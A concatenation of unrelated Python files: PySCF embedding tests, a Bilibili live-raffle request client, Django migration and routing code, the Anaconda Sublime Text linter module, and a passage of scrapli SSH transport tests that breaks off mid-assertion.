#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#ghost:C -0.7516 0.0225 0.0209
#ghost:H -1.1669 -0.8334 0.5687
#ghost:H -1.1157 0.9326 0.5151
#ghost:H -1.1850 0.0044 -0.9875
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'rohf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#ghost:H 1.1851 -0.0039 0.9875
#ghost:C 0.7516 -0.0225 -0.0209
#ghost:H 1.1669 0.8330 -0.5693
#ghost:H 1.1155 -0.9329 -0.5145
#'''
#mol2.basis = 'cc-pVDZ'
#mol2.spin = -1
#mol2.build()
#env_method = 'rohf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_conv=1e-10)
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-13)
#mol3 = gto.Mole()
#mol3.atom ='''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#'''
#mol3.basis = 'cc-pVDZ'
#mol3.build()
#mf = scf.RHF(mol3)
##mf.xc = 'm06'
##grids = supersystem.fs_scf.grids
##mf.grids = grids
#mf.kernel()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#ghost:C -0.7516 0.0225 0.0209
#ghost:H -1.1669 -0.8334 0.5687
#ghost:H -1.1157 0.9326 0.5151
#ghost:H -1.1850 0.0044 -0.9875
#'''
#mol.basis = '3-21g'
#mol.spin = 1
##mol.charge = -1
#mol.build()
#env_method = 'hf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, initguess='minao')
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#ghost:H 1.1851 -0.0039 0.9875
#ghost:C 0.7516 -0.0225 -0.0209
#ghost:H 1.1669 0.8330 -0.5693
#ghost:H 1.1155 -0.9329 -0.5145
#'''
#mol2.basis = '3-21g'
#mol2.spin = -1
##mol2.charge = 1
#mol2.build()
#env_method = 'hf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, initguess='minao')
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_cycles=100)
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-13)
#mol3 = gto.Mole()
#mol3.atom ='''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#'''
#mol3.basis = '3-21g'
#mol3.build()
#mf = scf.ROHF(mol3)
##mf.xc = 'm06'
##grids = supersystem.fs_scf.grids
##mf.grids = grids
#mf.kernel()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
##Long distance test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#O 0. 0. 0.
#O 1.13 0. 0.
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 2
#mol.build()
#env_method = 'rohf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#O 0. 100.0 0.0
#O 1.13 100.0 0.0
#'''
#mol2.basis = 'cc-pVDZ'
#mol2.spin = -2
#mol2.build()
#env_method = 'rohf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_initguess='supmol')
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-14)
#self.assertTrue(False)
#mol3 = gto.Mole()
#mol3.verbose = 3
#mol3.atom ='''
#Li 0. 0. 0.
#Li 12.22 0.0 0.0
#'''
#mol3.basis = '3-21g'
#mol3.build()
#mf = dft.UKS(mol3)
#mf.xc = 'm06'
#grids = dft.gen_grid.Grids(mol3)
#grids.level = supersystem.grid_level
#grids.build()
#mf.grids = grids
#mf.kernel()
#test_dmat = mf.make_rdm1()
#test_e = mf.energy_tot()
#sup_e = supersystem.env_in_env_energy()
#self.assertTrue(np.allclose(test_dmat, (supersystem.dmat[0] + supersystem.dmat[1]), atol=1e-6))
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Projection energy
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#Li 0. 0. 0.
#'''
#mol.basis = '3-21g'
#mol.spin = 1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#Li 1.595 0.0 0.0
#'''
#mol2.basis = '3-21g'
#mol2.spin = -1
#mol2.build()
#env_method = 'm06'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', ft_initguess='supmol', fs_unrestricted=True, ft_cycles=10)
#initial_projector_energy = 0.0
#initial_projector_energy = np.trace(np.dot(subsys.dmat[0], supersystem.proj_pot[0][0]))
#initial_projector_energy += np.trace(np.dot(subsys.dmat[1], supersystem.proj_pot[0][1]))
#initial_projector_energy += np.trace(np.dot(subsys2.dmat[0], supersystem.proj_pot[1][0]))
#initial_projector_energy += np.trace(np.dot(subsys2.dmat[1], supersystem.proj_pot[1][1]))
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.dmat[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.dmat[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.dmat[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.dmat[1], supersystem.proj_pot[1][1]))
#self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
@unittest.skip
def test_get_supersystem_nuc_grad(self):
#Closed Shell
t_file = tempfile.NamedTemporaryFile()
mol = gto.Mole()
#mol.verbose = 4
mol.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
'''
mol.basis = '3-21g'
mol.build()
env_method = 'b3lyp'
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method, filename=t_file.name)
mol2 = gto.Mole()
#mol2.verbose = 4
mol2.atom = '''
O 0.0 0.0 0.0'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'b3lyp'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, filename=t_file.name)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'b3lyp', ft_initguess='minao', filename=t_file.name)
supsystem_e = supersystem.get_supersystem_energy()
supsystem_grad = supersystem.get_supersystem_nuc_grad()
mol3 = gto.Mole()
#mol3.verbose = 4
mol3.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
O 0.0 0.0 0.0
'''
mol3.basis = '3-21g'
mol3.build()
test_scf = dft.RKS(mol3)
test_scf.xc = 'b3lyp'
test_scf.conv_tol = supersystem.fs_conv
grids = dft.gen_grid.Grids(mol3)
grids.level = supersystem.grid_level
grids.build()
test_scf.grids = grids
test_e = test_scf.kernel()
test_grad = test_scf.nuc_grad_method()
test_grad.kernel()
#self.assertAlmostEqual(test_grad.grad(), supsystem_grad.grad())
@unittest.skip
def test_get_subsystem_nuc_grad(self):
#Closed Shell
mol = gto.Mole()
#mol.verbose = 4
mol.atom = '''
O 0.0 0.0 0.0
'''
mol.basis = '3-21g'
mol.build()
env_method = 'b3lyp'
hl_method = 'rhf'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method)
mol2 = gto.Mole()
#mol2.verbose = 4
mol2.atom = '''
O 1.208 0.0 0.0
'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'b3lyp'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'b3lyp', ft_initguess='minao', ft_cycles=50)
supsystem_e = supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
subsystem_grad = subsys.get_env_nuc_grad()
subsys.hl_in_env_energy()
subsys.get_hl_nuc_grad()
supersystem_grad = supersystem.get_embedding_nuc_grad()
mol3 = gto.Mole()
#mol3.verbose = 4
mol3.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
O 0.0 0.0 0.0
H 0.758602 30.000000 0.504284
H 0.758602 30.000000 -0.504284
O 0.0 30.0 0.0
'''
mol3.basis = '3-21g'
mol3.build()
test_scf = dft.RKS(mol3)
test_scf.xc = 'b3lyp'
test_scf.conv_tol = supersystem.fs_conv
grids = dft.gen_grid.Grids(mol3)
grids.level = supersystem.grid_level
grids.build()
test_scf.grids = grids
test_e = test_scf.kernel()
test_grad = test_scf.nuc_grad_method()
elec_grad = test_grad.grad_elec(test_scf.mo_energy, test_scf.mo_coeff, test_scf.mo_occ)
#print (elec_grad)
#self.assertAlmostEqual(test_grad.grad(), supsystem_grad.grad())
@unittest.skip
def test_update_proj_pot(self):
"""This test is crude, but the only other way to do it would
be to actually calculate the projection operator."""
# Closed Shell
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
'''
mol.basis = '3-21g'
mol.build()
env_method = 'm06'
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
He 1.0 2.0 0.0
He 3.0 2.0 0.0'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, 'm06')
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, init_guess='minao')
supersystem.init_density()
# Calculate the huzinaga projector potential.
s2s = supersystem.sub2sup
sub_pop_list = [0,0]
for i in range(len(supersystem.subsystems)):
A = i
nA = supersystem.subsystems[A].mol.nao_nr()
SAA = supersystem.smat[np.ix_(s2s[A], s2s[A])]
POp = [np.zeros((nA, nA)), np.zeros((nA, nA))]
# cycle over all other subsystems
for B in range(len(supersystem.subsystems)):
if B==A: continue
SAB = supersystem.smat[np.ix_(s2s[A], s2s[B])]
SBA = supersystem.smat[np.ix_(s2s[B], s2s[A])]
FAB = [None, None]
FAB[0] = supersystem.fock[0][np.ix_(s2s[A], s2s[B])]
FAB[1] = supersystem.fock[1][np.ix_(s2s[A], s2s[B])]
FDS = [None, None]
FDS[0] = np.dot( FAB[0], np.dot( supersystem.subsystems[B].env_dmat[0], SBA ))
FDS[1] = np.dot( FAB[1], np.dot( supersystem.subsystems[B].env_dmat[1], SBA ))
POp[0] += -1. * ( FDS[0] + FDS[0].transpose() )
POp[1] += -1. * ( FDS[0] + FDS[0].transpose() )
sub_pop_list[i] = POp
self.assertTrue(np.allclose(sub_pop_list[0][0], supersystem.proj_pot[0][0]))
self.assertTrue(np.allclose(sub_pop_list[0][1], supersystem.proj_pot[0][1]))
self.assertTrue(np.allclose(sub_pop_list[1][0], supersystem.proj_pot[1][0]))
self.assertTrue(np.allclose(sub_pop_list[1][1], supersystem.proj_pot[1][1]))
if __name__ == "__main__":
unittest.main()
|
from bili_global import API_LIVE
import utils
from json_rsp_ctrl import Ctrl, In, JsonRspType
class TvRaffleHandlerReq:
@staticmethod
async def check(user, real_roomid):
url = f"{API_LIVE}/gift/v3/smalltv/check?roomid={real_roomid}"
response = await user.bililive_session.request_json('GET', url)
return response
@staticmethod
async def join(user, real_roomid, TV_raffleid):
url = f"{API_LIVE}/gift/v3/smalltv/join"
payload = {
"roomid": real_roomid,
"raffleId": TV_raffleid,
"type": "Gift",
"csrf_token": user.dict_bili['csrf']
}
response = await user.bililive_session.request_json('POST', url, data=payload, headers=user.dict_bili['pcheaders'])
return response
@staticmethod
async def join_v4(user, real_roomid, raffle_id, raffle_type):
url = f"{API_LIVE}/gift/v4/smalltv/getAward"
temp_params = f'access_key={user.dict_bili["access_key"]}&{user.app_params}&raffleId={raffle_id}&roomid={real_roomid}&ts={utils.curr_time()}&type={raffle_type}'
sign = user.calc_sign(temp_params)
payload = f'{temp_params}&sign={sign}'
json_rsp = await user.bililive_session.request_json('POST', url, params=payload, headers=user.dict_bili['appheaders'], ctrl=ReqCtrl.join_v4_ctrl)
return json_rsp
@staticmethod
async def notice(user, TV_roomid, TV_raffleid):
url = f"{API_LIVE}/gift/v3/smalltv/notice?type=small_tv&raffleId={TV_raffleid}"
response = await user.bililive_session.request_json('GET', url, headers=user.dict_bili['pcheaders'])
return response
class ReqCtrl:
join_v4_ctrl = Ctrl(
extend=(
{'code': -401, 'msg': In('登陆')}, JsonRspType.LOGOUT,
{'code': 0}, JsonRspType.OK,
{'code': -405}, JsonRspType.OK, # 奖品都被领完啦
{'code': -403, 'msg': In('已')}, JsonRspType.OK, # 'code': -403, 'msg': '您已参加抽奖~'
{'code': -403, 'msg': In('拒绝')}, JsonRspType.OK, # 'code': -403, 'msg': '访问被拒绝'
{'code': -401, 'msg': In('没开始')}, JsonRspType.OK, # 抽奖还没开始哦
)
)
|
# Generated by Django 3.0.7 on 2020-07-06 14:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
('library', '0002_item_project'),
]
operations = [
migrations.AddField(
model_name='item',
name='summary',
field=models.TextField(default=''),
),
migrations.AlterField(
model_name='item',
name='project',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project'),
),
]
|
from .date_viewsets import DayTemplateRuleViewSet, RuleSetElementViewSet, \
RuleSetViewSet, BaseRuleViewSet, DateRuleViewSet
from .delta_viewsets import DeltaViewSet
from .schedule_viewsets import ScheduleViewSet, TaskViewSet
|
from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^forms/$', views.forms, name="view"),
url(r'^board/$', views.board, name="board"),
url(r'^config/$', views.config, name="config"),
url(r'^$', views.main, name="main")
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
import os
import re
import time
from functools import partial
import sublime
from . import pycodestyle as pep8
from ..worker import Worker
from ..callback import Callback
from ..persistent_list import PersistentList
from ..helpers import (
get_settings, is_code, get_view, check_linting, LINTING_ENABLED
)
from ..phantoms import Phantom
sublime_api = sublime.sublime_api
ANACONDA = {
'ERRORS': {},
'WARNINGS': {},
'VIOLATIONS': {},
'UNDERLINES': {},
'LAST_PULSE': time.time(),
'ALREADY_LINTED': False,
'DISABLED': PersistentList(),
'DISABLED_BUFFERS': []
}
marks = {
'warning': 'dot',
'violation': 'dot',
'illegal': 'circle'
}
###############################################################################
# Classes
###############################################################################
class Linter:
"""Linter class that can interacts with Sublime Linter GUI
"""
def __init__(self, view):
self.view = view
def add_message(self, lineno, lines, message, messages):
# assume lineno is one-based, ST3 wants zero-based line numbers
lineno -= 1
lines.add(lineno)
message = message[0].upper() + message[1:]
# Remove trailing period from error message unless the message is "can't import ."
if message.endswith('.') and not message.endswith("import ."):
message = message[:-1]
if lineno in messages:
messages[lineno].append(message)
else:
messages[lineno] = [message]
def underline_range(self, lineno, position, underlines, length=1):
# assume lineno is one-based, ST3 wants zero-based line numbers
lineno -= 1
line = self.view.full_line(self.view.text_point(lineno, 0))
position += line.begin()
for i in range(length):
region = sublime.Region(position + i)
if self.is_that_code(region.begin()):
underlines.append(sublime.Region(position + i))
def underline_regex(self, **kwargs):
# assume lineno is one-based, ST3 wants zero-based line numbers
offset = 0
lineno = kwargs.get('lineno', 1) - 1
kwargs.get('lines', set()).add(lineno)
line = self.view.full_line(self.view.text_point(lineno, 0))
line_text = self.view.substr(line)
if kwargs.get('linematch') is not None:
match = re.match(kwargs['linematch'], line_text)
if match is not None:
line_text = match.group('match')
offset = match.start('match')
else:
return
iters = re.finditer(kwargs.get('regex'), line_text)
results = [
(r.start('underline'), r.end('underline')) for r in iters if (
kwargs.get('wordmatch') is None or
r.group('underline') == kwargs.get('wordmatch')
)
]
# make the lineno one-based again for underline_range
lineno += 1
for start, end in results:
self.underline_range(
lineno, start + offset, kwargs['underlines'], end - start
)
def is_that_code(self, point):
"""Determines if the given region is valid Python code
"""
matcher = 'source.python - string - comment'
return self.view.match_selector(point, matcher)
def parse_errors(self, errors):
"""Parse errors returned from the PyFlakes and pep8 libraries
"""
vid = self.view.id()
errors_level = {
'E': {'messages': ANACONDA.get('ERRORS')[vid], 'underlines': []},
'W': {'messages': ANACONDA.get('WARNINGS')[vid], 'underlines': []},
'V': {
'messages': ANACONDA.get('VIOLATIONS')[vid], 'underlines': []
}
}
lines = set()
if errors is None:
return {'lines': lines, 'results': errors_level}
ignore_star = get_settings(self.view, 'pyflakes_ignore_import_*', True)
for error in errors:
try:
line_text = self.view.substr(self.view.full_line(
self.view.text_point(error['lineno']-1, 0)
))
if '# noqa' in line_text:
continue
except Exception as e:
print(e)
error_level = error.get('level', 'W')
messages = errors_level[error_level]['messages']
underlines = errors_level[error_level]['underlines']
if 'raw_error' not in error:
error['raw_error'] = error['message']
if 'import *' in error['raw_error'] and ignore_star:
continue
self.add_message(
error['lineno'], lines, error['raw_error'], messages
)
if error['underline_range'] is True:
self.underline_range(
error['lineno'], error['offset'], underlines
)
elif error.get('len') is not None and error.get('regex') is None:
self.underline_range(
error['lineno'], error['offset'],
underlines, error['len']
)
else:
self.underline_regex(
lines=lines, underlines=underlines, **error
)
return {'lines': lines, 'results': errors_level}
###############################################################################
# Global functions
###############################################################################
def erase_lint_marks(view):
"""Erase all the lint marks
"""
if get_settings(view, 'anaconda_linter_phantoms', False):
Phantom().clear_phantoms(view)
types = ['illegal', 'warning', 'violation']
for t in types:
view.erase_regions('anaconda-lint-underline-{}'.format(t))
view.erase_regions('anaconda-lint-outlines-{}'.format(t))
def add_lint_marks(view, lines, **errors):
"""Adds lint marks to view on the given lines.
"""
erase_lint_marks(view)
types = {
'warning': errors['warning_underlines'],
'illegal': errors['error_underlines'],
'violation': errors['violation_underlines'],
}
style = get_settings(view, 'anaconda_linter_mark_style', 'outline')
show_underlines = get_settings(view, 'anaconda_linter_underlines', True)
if show_underlines:
for type_name, underlines in types.items():
if len(underlines) > 0:
view.add_regions(
'anaconda-lint-underline-{}'.format(type_name), underlines,
'anaconda.underline.{}'.format(type_name),
flags=sublime.DRAW_EMPTY_AS_OVERWRITE
)
if len(lines) > 0:
outline_style = {
'solid_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SOLID_UNDERLINE, # noqa
'stippled_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_STIPPLED_UNDERLINE, # noqa
'squiggly_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SQUIGGLY_UNDERLINE, # noqa
'outline': sublime.DRAW_OUTLINED,
'none': sublime.HIDDEN,
'fill': None
}
gutter_theme = get_settings(
view, 'anaconda_gutter_theme', 'basic').lower()
package_name = os.path.dirname(__file__).rsplit(os.path.sep, 3)[1]
ico_path = (
'Packages/' + package_name + '/anaconda_lib/linting/'
'gutter_mark_themes/{theme}-{type}.png'
)
if get_settings(view, 'anaconda_linter_phantoms', False):
phantom = Phantom()
vid = view.id()
phantoms = []
for level in ['ERRORS', 'WARNINGS', 'VIOLATIONS']:
for line, messages in ANACONDA.get(level)[vid].items():
for message in messages:
phantoms.append({
"line": line,
"level": level.lower(),
"messages": message
})
phantom.update_phantoms(view, phantoms)
for lint_type, lints in get_outlines(view).items():
if len(lints) > 0:
if get_settings(view, 'anaconda_gutter_marks', False):
if gutter_theme == 'basic':
gutter_marks = marks[lint_type]
else:
gutter_marks = ico_path.format(theme=gutter_theme,
type=lint_type)
else:
gutter_marks = ''
args = [
'anaconda-lint-outlines-{}'.format(lint_type),
lints,
'anaconda.outline.{}'.format(lint_type),
gutter_marks
]
draw_style = outline_style.get(style, sublime.DRAW_OUTLINED)
if draw_style is not None:
args.append(draw_style)
view.add_regions(*args)
def get_outlines(view):
"""Return outlines for the given view
"""
ERRORS = ANACONDA.get('ERRORS')
WARNINGS = ANACONDA.get('WARNINGS')
VIOLATIONS = ANACONDA.get('VIOLATIONS')
vid = view.id()
return {
'warning': [
view.full_line(view.text_point(l, 0)) for l in WARNINGS[vid]
],
'illegal': [
view.full_line(view.text_point(l, 0)) for l in ERRORS[vid]
],
'violation': [
view.full_line(view.text_point(l, 0)) for l in VIOLATIONS[vid]
]
}
def last_selected_lineno(view):
"""Return back the last selected line number
"""
sel = view.sel()
return None if sel is None else view.rowcol(sel[0].end())[0]
def update_statusbar(view):
"""Updates the status bar
"""
errors = get_lineno_msgs(view, last_selected_lineno(view))
if len(errors) > 0:
view.set_status('Linter', '; '.join(errors))
else:
view.erase_status('Linter')
def get_lineno_msgs(view, lineno):
"""Get lineno error messages and return it back
"""
ERRORS = ANACONDA.get('ERRORS')
WARNINGS = ANACONDA.get('WARNINGS')
VIOLATIONS = ANACONDA.get('VIOLATIONS')
errors_msg = []
if lineno is not None:
vid = view.id()
if vid in ERRORS:
errors_msg.extend(ERRORS[vid].get(lineno, []))
if vid in WARNINGS:
errors_msg.extend(WARNINGS[vid].get(lineno, []))
if vid in VIOLATIONS:
errors_msg.extend(VIOLATIONS[vid].get(lineno, []))
return errors_msg
def run_linter(view=None, hook=None):
"""Run the linter for the given view
"""
if view is None:
view = sublime.active_window().active_view()
window_view = (sublime.active_window().id(), view.id())
if (view.file_name() in ANACONDA['DISABLED']
or window_view in ANACONDA['DISABLED_BUFFERS']):
erase_lint_marks(view)
return
settings = {
'pep8': get_settings(view, 'pep8', True),
'pep8_ignore': get_settings(view, 'pep8_ignore', []),
'pep8_max_line_length': get_settings(
view, 'pep8_max_line_length', pep8.MAX_LINE_LENGTH),
'pep8_error_levels': get_settings(view, 'pep8_error_levels', None),
'pyflakes_ignore': get_settings(view, 'pyflakes_ignore', []),
'pyflakes_disabled': get_settings(
view, 'pyflakes_disabled', False),
'use_pylint': get_settings(view, 'use_pylint', False),
'use_pep257': get_settings(view, 'pep257', False),
'validate_imports': get_settings(view, 'validate_imports', False),
'pep257_ignore': get_settings(view, 'pep257_ignore', []),
'pep8_rcfile': get_settings(view, 'pep8_rcfile'),
'pylint_rcfile': get_settings(view, 'pylint_rcfile'),
'pylint_ignores': get_settings(view, 'pylint_ignore'),
'pyflakes_explicit_ignore': get_settings(
view, 'pyflakes_explicit_ignore', []),
'use_mypy': get_settings(view, 'mypy', False),
'mypy_settings': get_mypy_settings(view),
'mypypath': get_settings(view, 'mypy_mypypath', ''),
'python_interpreter': get_settings(view, 'python_interpreter', ''),
}
text = view.substr(sublime.Region(0, view.size()))
data = {
'vid': view.id(),
'code': text,
'settings': settings,
'filename': view.file_name(),
'method': 'lint',
'handler': 'python_linter'
}
if hook is None:
Worker().execute(Callback(on_success=parse_results), **data)
else:
Worker().execute(Callback(partial(hook, parse_results)), **data)
def get_mypy_settings(view):
"""Get MyPy related settings
"""
mypy_settings = []
if get_settings(view, 'mypy_silent_imports', False):
mypy_settings.append('--ignore-missing-imports')
mypy_settings.append('--follow-imports=skip')
if get_settings(view, 'mypy_almost_silent', False):
mypy_settings.append('--follow-imports=error')
if get_settings(view, 'mypy_py2', False):
mypy_settings.append('--py2')
if get_settings(view, 'mypy_disallow_untyped_calls', False):
mypy_settings.append('--disallow-untyped-calls')
if get_settings(view, 'mypy_disallow_untyped_defs', False):
mypy_settings.append('--disallow-untyped-defs')
if get_settings(view, 'mypy_check_untyped_defs', False):
mypy_settings.append('--check-untyped-defs')
if get_settings(view, 'mypy_fast_parser', False):
mypy_settings.append('--fast-parser')
custom_typing = get_settings(view, 'mypy_custom_typing', None)
if custom_typing is not None:
mypy_settings.append('--custom-typing')
mypy_settings.append(custom_typing)
mypy_settings.append('--incremental') # use cache always
mypy_settings.append(
get_settings(view, 'mypy_suppress_stub_warnings', False)
)
return mypy_settings
def parse_results(data, code='python'):
"""Parse the results from the server
"""
view = get_view(sublime.active_window(), data['vid'])
if data and data['success'] is False or not is_code(view, code, True):
if get_settings(view, 'use_pylint', False) is True:
for p in data['errors']:
print(p)
return
# Check if linting was disabled between now and when the request was sent
# to the server.
window_view = (sublime.active_window().id(), view.id())
if (not check_linting(view, LINTING_ENABLED) or
view.file_name() in ANACONDA['DISABLED']
or window_view in ANACONDA['DISABLED_BUFFERS']):
return
vid = view.id()
ANACONDA['ERRORS'][vid] = {}
ANACONDA['WARNINGS'][vid] = {}
ANACONDA['VIOLATIONS'][vid] = {}
results = Linter(view).parse_errors(data['errors'])
errors = results['results']
lines = results['lines']
ANACONDA['UNDERLINES'][vid] = errors['E']['underlines'][:]
ANACONDA['UNDERLINES'][vid].extend(errors['V']['underlines'])
ANACONDA['UNDERLINES'][vid].extend(errors['W']['underlines'])
errors = {
'error_underlines': errors['E']['underlines'],
'warning_underlines': errors['W']['underlines'],
'violation_underlines': errors['V']['underlines']
}
add_lint_marks(view, lines, **errors)
update_statusbar(view)
|
import pty
from io import BytesIO
import pytest
from scrapli.exceptions import (
ScrapliConnectionError,
ScrapliConnectionNotOpened,
ScrapliUnsupportedPlatform,
)
from scrapli.transport.plugins.system.ptyprocess import PtyProcess
from scrapli.transport.plugins.system.transport import SystemTransport
def test_unsupported_platform(monkeypatch, base_transport_args, system_transport_plugin_args):
monkeypatch.setattr("sys.platform", "win")
with pytest.raises(ScrapliUnsupportedPlatform):
SystemTransport(
base_transport_args=base_transport_args,
plugin_transport_args=system_transport_plugin_args,
)
def test_build_open_cmd(system_transport):
system_transport.plugin_transport_args.auth_private_key = "private_key"
system_transport.plugin_transport_args.auth_strict_key = False
system_transport.plugin_transport_args.ssh_config_file = "ssh_config"
system_transport._base_transport_args.transport_options = {
"open_cmd": ["somearg", "anotherarg"]
}
system_transport._build_open_cmd()
assert system_transport.open_cmd == [
"ssh",
"localhost",
"-p",
"22",
"-o",
"ConnectTimeout=10",
"-o",
"ServerAliveInterval=30",
"-i",
"private_key",
"-l",
"scrapli",
"-o",
"StrictHostKeyChecking=no",
"-o",
"UserKnownHostsFile=/dev/null",
"-F",
"ssh_config",
"somearg",
"anotherarg",
]
def test_build_open_cmd_alternate_options(system_transport):
system_transport.plugin_transport_args.auth_private_key = "private_key"
system_transport.plugin_transport_args.auth_strict_key = True
system_transport.plugin_transport_args.ssh_known_hosts_file = "ssh_known_hosts"
system_transport._base_transport_args.transport_options = {"open_cmd": "additional_cmd"}
system_transport._build_open_cmd()
assert system_transport.open_cmd == [
"ssh",
"localhost",
"-p",
"22",
"-o",
"ConnectTimeout=10",
"-o",
"ServerAliveInterval=30",
"-i",
"private_key",
"-l",
"scrapli",
"-o",
"StrictHostKeyChecking=yes",
"-o",
"UserKnownHostsFile=ssh_known_hosts",
